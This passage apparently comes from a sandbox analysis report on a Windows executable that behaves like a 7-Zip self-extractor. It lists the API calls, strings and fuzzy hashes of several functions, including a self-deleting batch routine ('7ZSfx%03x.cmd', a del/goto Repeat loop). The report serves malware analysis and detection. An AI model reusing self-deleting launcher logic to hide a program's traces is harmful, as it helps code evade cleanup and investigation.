                                                                      • GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
                                                                      • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
                                                                      • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
                                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
                                                                      • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
                                                                      • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
                                                                      • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
                                                                      • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                                      • String ID: " -$sfxwaitall
                                                                      • API String ID: 2734624574-3991362806
                                                                      • Opcode ID: c576ddda3cb22813f92d1ea0a50b073aab1b0f041d900a3914aafabf44139407
                                                                      • Instruction ID: b3327515afe2f0509fed3fa0d446ddd4546a9b02c844584286d91d1d95b89973
                                                                      • Opcode Fuzzy Hash: c576ddda3cb22813f92d1ea0a50b073aab1b0f041d900a3914aafabf44139407
                                                                      • Instruction Fuzzy Hash: 73614DB2800148BBDF11BFA1DC45EDF3B6CFF54308F10853AFA15A21A1DA399A559F68
                                                                      Function 00405304 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
                                                                      • WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
                                                                      • CloseHandle.KERNEL32(00419858), ref: 00405445
                                                                      • SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
                                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
                                                                      • ??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
                                                                      • ??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                      • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                      • API String ID: 3007203151-3467708659
                                                                      • Opcode ID: bc9866227df6a082dd45c647f50685e9e39f62763f2fa5a47f650fc85807f56f
                                                                      • Instruction ID: d0d69a7dd8ff82dd971fb120c5bc6d20105d604efb913bdcb2d31d3208e79299
                                                                      • Opcode Fuzzy Hash: bc9866227df6a082dd45c647f50685e9e39f62763f2fa5a47f650fc85807f56f
                                                                      • Instruction Fuzzy Hash: 8E418E31C00109BADB11ABA0DC86DEF7779EF14319F50802AF515761E1EB785E86DB68
                                                                      Function 00404B06 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 207stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2
                                                                        • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                        • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                        • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                        • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                        • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                        • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                        • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                        • Part of subcall function 00402187: lstrcmpiW.KERNEL32(02533FD0,00404926), ref: 0040224B
                                                                        • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(02533FD0), ref: 0040225B
                                                                        • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                        • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                        • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                        • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                      • _wtol.MSVCRT ref: 00404CDF
                                                                      • _wtol.MSVCRT ref: 00404CFB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                      • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$_
                                                                      • API String ID: 2725485552-3483632650
                                                                      • Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                      • Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
                                                                      • Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                      • Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D
                                                                      Function 0040312D Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClassNameA.USER32(?,?,00000040), ref: 00403140
                                                                      • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00403160
                                                                        • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                        • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
                                                                      • GetParent.USER32(?), ref: 0040319B
                                                                      • LoadLibraryA.KERNEL32(riched20), ref: 004031AF
                                                                      • GetMenu.USER32(?), ref: 004031C2
                                                                      • SetThreadLocale.KERNEL32(00000419), ref: 004031CF
                                                                      • CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
                                                                      • DestroyWindow.USER32(?), ref: 00403210
                                                                      • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
                                                                      • GetSysColor.USER32(0000000F), ref: 00403229
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
                                                                      • SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                      • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                      • API String ID: 3514532227-2281146334
                                                                      • Opcode ID: 6a2ef85bb8466b284f341e562f305245560d17f4b0350e1b805e867f4a5d8a7e
                                                                      • Instruction ID: 373b527b6ca097a0cf97d4fb6958eb329f6bb70dd43407f4b4eeb9307f1859e1
                                                                      • Opcode Fuzzy Hash: 6a2ef85bb8466b284f341e562f305245560d17f4b0350e1b805e867f4a5d8a7e
                                                                      • Instruction Fuzzy Hash: 61319E72900509FFDB01AFA4DC49EEF7BBDAF48716F108036F605F6190DA788A418B68
                                                                      Function 004086EB Relevance: 34.8, APIs: 23, Instructions: 265windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                      • LoadIconW.USER32(00000000), ref: 00408717
                                                                      • GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                      • GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                      • LoadImageW.USER32(00000000), ref: 0040873C
                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                      • GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                      • GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                      • GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                      • GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                      • GetWindow.USER32(?,00000005), ref: 004088C3
                                                                      • GetWindow.USER32(?,00000005), ref: 004088DF
                                                                      • GetWindow.USER32(?,00000005), ref: 004088F7
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
                                                                      • LoadIconW.USER32(00000000), ref: 0040895E
                                                                      • GetDlgItem.USER32(?,000004B1), ref: 0040897D
                                                                      • SendMessageW.USER32(00000000), ref: 00408980
                                                                        • Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
                                                                        • Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E
                                                                        • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                        • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                      • String ID:
                                                                      • API String ID: 3694754696-0
                                                                      • Opcode ID: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                      • Instruction ID: ec505544c7bb35dede6d5bcefb07895398d021ded876e535e02418492f258e54
                                                                      • Opcode Fuzzy Hash: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                      • Instruction Fuzzy Hash: D671F8B1344705ABE6117B619E4AF3B7659DB80714F10443EF6827A2E2CFBCAC018A5E
                                                                      Function 00401EB2 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                      • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                      • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                      • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                      • CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                      • CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                      • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                      • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                      • GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                      • DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                      • DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00401FC5
                                                                      • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                      • String ID:
                                                                      • API String ID: 3462224810-0
                                                                      • Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                      • Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
                                                                      • Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                      • Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4
                                                                      Function 00401FDD Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
                                                                      • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00402019
                                                                      • GetMenu.USER32(?), ref: 0040202E
                                                                        • Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                        • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                        • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                        • Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                        • Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                        • Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
                                                                      • memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
                                                                      • CoInitialize.OLE32(00000000), ref: 00402076
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 004020B7
                                                                        • Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                        • Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                        • Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                        • Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                        • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                        • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                        • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                        • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                        • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                        • Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                        • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                        • Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                        • Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                        • Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                        • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                        • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                        • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                        • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                        • Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
                                                                      • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
                                                                      • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402124
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                      • String ID: IMAGES$STATIC
                                                                      • API String ID: 4202116410-1168396491
                                                                      • Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                      • Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
                                                                      • Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                      • Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64
                                                                      Function 00408B36 Relevance: 27.1, APIs: 18, Instructions: 144windowcomtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                        • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                      • GetDlgItem.USER32(?,000004B8), ref: 00408B63
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
                                                                      • GetDlgItem.USER32(?,000004B5), ref: 00408BB9
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
                                                                      • GetDlgItem.USER32(?,000004B5), ref: 00408BCE
                                                                      • SetWindowLongW.USER32(00000000), ref: 00408BD1
                                                                      • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
                                                                      • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
                                                                      • GetDlgItem.USER32(?,000004B4), ref: 00408C13
                                                                      • SetFocus.USER32(00000000), ref: 00408C16
                                                                      • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
                                                                      • CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00408C86
                                                                      • IsWindow.USER32(00000000), ref: 00408C89
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00408C99
                                                                      • EnableWindow.USER32(00000000), ref: 00408C9C
                                                                      • GetDlgItem.USER32(?,000004B5), ref: 00408CB0
                                                                      • ShowWindow.USER32(00000000), ref: 00408CB3
                                                                        • Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49
                                                                        • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                        • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                        • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                        • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                        • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                        • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                        • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                        • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                        • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                        • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                        • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                        • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                                      • String ID:
                                                                      • API String ID: 1057135554-0
                                                                      • Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                      • Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
                                                                      • Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                      • Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C
                                                                      Function 004072F5 Relevance: 24.3, APIs: 16, Instructions: 294COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000004B3), ref: 0040731D
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
                                                                      • GetDlgItem.USER32(?,000004B4), ref: 00407359
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
